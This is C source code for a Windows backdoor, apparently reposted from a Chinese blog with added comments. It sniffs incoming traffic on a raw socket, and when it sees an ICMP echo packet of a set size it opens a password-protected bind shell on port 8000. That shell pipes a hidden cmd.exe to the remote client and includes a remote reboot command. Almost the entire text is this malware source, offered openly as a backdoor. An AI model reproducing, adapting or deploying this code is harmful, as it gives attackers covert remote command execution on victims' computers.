// //simple door //二〇一零年 二月四号 //author: LION //路子注释 //广西桂林 EST // #include <winsock2.h> #include <stdio.h> #include <stdlib.h> #include <Ws2tcpip.h> #include <windows.h> #include <MSTCPIP.h> // #pragma comment(lib,"wsock32") // #define ICMP_ECHO 8 //ICMP 回显请求报文类型为8 #define ICMP_ECHOREPLY 0 //ICMP 回显应答报文的类型值为0 #define SNIFFER_ICMP_SIZE 101 //监听ICMP包的大小 #define BIND_PORT 8000 //默认bind shell 端口 #define MAX_PACKET 10000 //最大ICMP包的大小 #define DEF_PASSWORD "shandongluzi"//默认密码 #define xmalloc(s) HeapAlloc(GetProcessHeap(),HEAP_ZERO_MEMORY,(s)) // //定义IP首部 // typedef struct iphdr { // 类型 变量名称 解释 字节数 unsigned char h_verlen;//4位首部长度 4位IP版本号 1 unsigned char tos; //8位服务类型TOS 1 unsigned short total_len;//16位总长度(字节) 2 unsigned short ident; //16位标识 2 unsigned short frag_and_flags;//3位标志位 2 unsigned char ttl; //8位生存时间TTL 1 unsigned char proto; //8位协议 1 unsigned short checksum;//16位IP首部校验和 2 unsigned int sourceIP;//32位IP地址 4 unsigned int destip; //32位目的IP地址 4 }IPHeader; //IP首部长度为 20 // //定义ICMP首部 // typedef struct _ihdr { unsigned char i_type;//8位类型 1 unsigned char i_code;//8位代码 1 unsigned short i_cksum;//16位校验和 2 unsigned short i_id;//识别号(用进程号作为识别) 2 unsigned short i_seq;//报文序列号 2 }ICMPHeader;//ICMP首部长度为 8 // //函数定义 // int sniffer();//监听ICMP大小 //简单SNIFFER void decode_sniffer(char *,int ,struct sockaddr_in *); int binshell();//绑定shell DWORD dwBufferlen[10]; //缓冲区 DWORD dwBufferlnlen=1; //缓冲长度 DWORD dwBytesReturned=0;//返回长度 HANDLE bindthread; //句柄 //DOOR 主函数 // int main() { WSADATA wsaData;//定义数据 int retval;//返回值 //SOCKET 初始化 if ((retval=WSAStartup(MAKEWORD(2,2),&wsaData))!=0) { printf("WSASTARTUP failed:%d/n",retval); exit(-1); } //sniffer开始 sniffer(); //socker 结束 WSACleanup(); return 0; } // //sniffer 函数 // int sniffer() { int packsize=SNIFFER_ICMP_SIZE;//ICMP 包的大小 SOCKET sockersniffer; //socket struct sockaddr_in fro; //原IP struct sockaddr_in des; //目的IP struct hostent *hp; //本机IP int sread; //读取 int fromlen=sizeof(fro);//原IP长度 unsigned char LocalName[256];//本地名 char *recvbuf;//接收数据 // //创建一个原始socket,接受所有接受的包 if ((sockersniffer=WSASocket(AF_INET,SOCK_RAW,IPPROTO_IP,NULL,0,WSA_FLAG_OVERLAPPED))==INVALID_SOCKET) { printf("wsasocket error %d/n",WSAGetLastError()); return -1; } //获取本地地址 gethostname((char*)LocalName,sizeof(LocalName)-1); if((hp=gethostbyname((char*)LocalName))==NULL) { return -1; } // //初始化DES目的IP memset(&des,0,sizeof(des)); memset(&des.sin_addr.S_un.S_addr,(int)hp->h_addr_list[0],hp->h_length); // //tcp嗅探选项 des.sin_family=AF_INET; des.sin_port=htons(8000); // //socket bind bind(sockersniffer,(PSOCKADDR)&des,sizeof(des)); // //设置socket为接受所有包 WSAIoctl(sockersniffer,SIO_RCVALL,&dwBufferlnlen,sizeof(dwBufferlnlen),&dwBufferlen,sizeof(dwBufferlen),&dwBytesReturned,NULL,NULL); //分配scoket接受缓冲区大小为MAX_PACKET recvbuf=(char*)xmalloc(MAX_PACKET); printf("sinffer ok/n"); while(1) { //读数据 sread=recvfrom(sockersniffer,recvbuf,MAX_PACKET,0,(struct sockaddr*)&fro,&fromlen); // //读取数据出错 if(sread==SOCKET_ERROR || sread <0) { //超时 继续 if(WSAGetLastError()==WSAETIMEDOUT) { continue; } printf("recvfrom failed :%d/n",WSAGetLastError()); return -1; } else if (sread >=28) {// //如果读到数据的大小==监听包的大小+28 if(sread==packsize+28) {//将接受到的数据交给sniffer解释程序处理 decode_sniffer(recvbuf,sread-28,&fro); } } return 1; } } // //简单的sniffer解包程序 void decode_sniffer(char *buf, int bytes, struct sockaddr_in * from) { //ICMP包 ICMPHeader *icmphdr; //icmp首部地址等于BUF+IP首部长度 buf+20 icmphdr=(ICMPHeader *)(buf+sizeof(IPHeader)); //简单判断如果为ICMP请求包 if(icmphdr->i_type==ICMP_ECHO) { //bind shell binshell(); } else printf("/r/nGEt others packets!"); return; } // //bind shell int binshell() { int bport=BIND_PORT;//绑定端口 SOCKET binserver,getclient;//客户端 和服务器 struct sockaddr_in addrserver,addrClient;//客户端和服务器 // //定义各种字符 char Buffer[4096]; char *Message="/r luzi EST/r/n"; char *getpass="/r enter password"; char *passok="/r/nok! enter "; char *nothispass="/r/n sorry password is wrong/n"; char *exitok="/r/nExit ok/n"; char *rebook="/r/n Reboot now!/r/n"; // //创建一个socket binserver=socket(AF_INET,SOCK_RAW,IPPROTO_IP); //服务器地址和端口制定 addrserver.sin_family=AF_INET; addrserver.sin_port=htons(bport); addrserver.sin_addr.S_un.S_addr=ADDR_ANY; //设置超时 int timeout=60000; setsockopt(binserver,SOL_SOCKET,SO_RCVTIMEO,(CHAR *)&timeout,sizeof(timeout)); //设置重复利用端口 UINT bRetUser=1; setsockopt(binserver,SOL_SOCKET,SO_REUSEADDR,(CHAR *)&bRetUser,sizeof(bRetUser)); //监听端口 bind(binserver,(struct sockaddr *)&addrserver,sizeof(addrserver)); listen(binserver,2); printf("/r/n bind port on %d ok/n",bport); //接受客户端连接 int ilen=sizeof(addrClient); //接受1次连接 getclient=accept(binserver,(struct sockaddr *)&addrClient,&ilen); if(getclient!=INVALID_SOCKET) { //如果有连接进来设置延时为60S int itimeout=60000; setsockopt(getclient,SOL_SOCKET,SO_RCVTIMEO,(char *)&itimeout,sizeof(itimeout)); } else { return -1; } //写欢迎信息 send(getclient,Message,strlen(Message),0); //写密码验证信息 send(getclient,getpass,strlen(getpass),0); //接受数据 recv(getclient,Buffer,1024,0); //验证密码 if(!(strstr(Buffer,DEF_PASSWORD))) { //如果密码错误,写密码错误信息 send(getclient,nothispass,strlen(nothispass),0); printf("/r/n password not ghist"); closesocket(getclient); closesocket(binserver); return -1; } //写通过验证信息 send(getclient,passok,strlen(passok),0); //建立两个匿名管道 HANDLE HReadpipe1,hWritePipe1,Headpipe2,Hwritepipe2; unsigned long lBytesRead; SECURITY_ATTRIBUTES sa; sa.nLength=12; sa.lpSecurityDescriptor=0; sa.bInheritHandle=TRUE; //创建PIPE CreatePipe(&HReadpipe1,&hWritePipe1,&sa,0); CreatePipe(&Headpipe2,&Hwritepipe2,&sa,0); STARTUPINFO siinfo; char cmdline[]="cmd.exe"; // PROCESS_INFORMATION processinformation; ZeroMemory(&siinfo,sizeof(siinfo)); siinfo.dwFlags=STARTF_USESHOWWINDOW | STARTF_USESTDHANDLES; siinfo.wShowWindow=SW_HIDE; siinfo.hStdInput=Headpipe2;//读socket写入PIPE2的数据 siinfo.hStdOutput=siinfo.hStdError=hWritePipe1;//写数据 printf("/r/ncreata pipe ok/n"); // //创建一个cmd进程 由HREADPIPE2读数据 向HWRTIEPIPE1 写数据 int bread=CreateProcess(NULL,cmdline,NULL,NULL,1,0,NULL,NULL,&siinfo,&processinformation); while (1) { //检查管道是否有数据返回 int ret=PeekNamedPipe(HReadpipe1,Buffer,1024,&lBytesRead,0,0); if(lBytesRead) { //从管道HREADPIPE1读数据 ret=ReadFile(HReadpipe1,Buffer,lBytesRead,&lBytesRead,0); if(!ret) break; //把管道HEADPIPE1读到的数据写如GETCILENT中 ret=send(getclient,Buffer,lBytesRead,0); if(ret<=0) break; } else { //如果连接getclient有接受到数据 lBytesRead=recv(getclient,Buffer,1024,0); if (lBytesRead<=0) break; //把从连接getclient读到的数据写入hwitre2 ret=WriteFile(Hwritepipe2,Buffer,lBytesRead,&lBytesRead,0); if(lBytesRead>4 && Buffer[0]=='e' && Buffer[1]=='x' && Buffer[2]=='i' && Buffer[3]=='t') { //写退出信息 send(getclient,exitok,strlen(exitok),0); closesocket(getclient); closesocket(binserver); return -1; } else { if(lBytesRead>6 && Buffer[0]=='r' && Buffer[1]=='e'&& Buffer[2]=='b'&& Buffer[3]=='o'&&Buffer[4]=='t') { //写重启 send(getclient,rebook,strlen(rebook),0); closesocket(getclient); closesocket(binserver); ExitWindowsEx(EWX_REBOOT,NULL); return 1; } if(!ret) break; } } closesocket(getclient); closesocket(binserver); return 1; } return 0; } |
简单后门 c++版 当年LION写 现详细注释
最新推荐文章于 2021-07-14 12:04:40 发布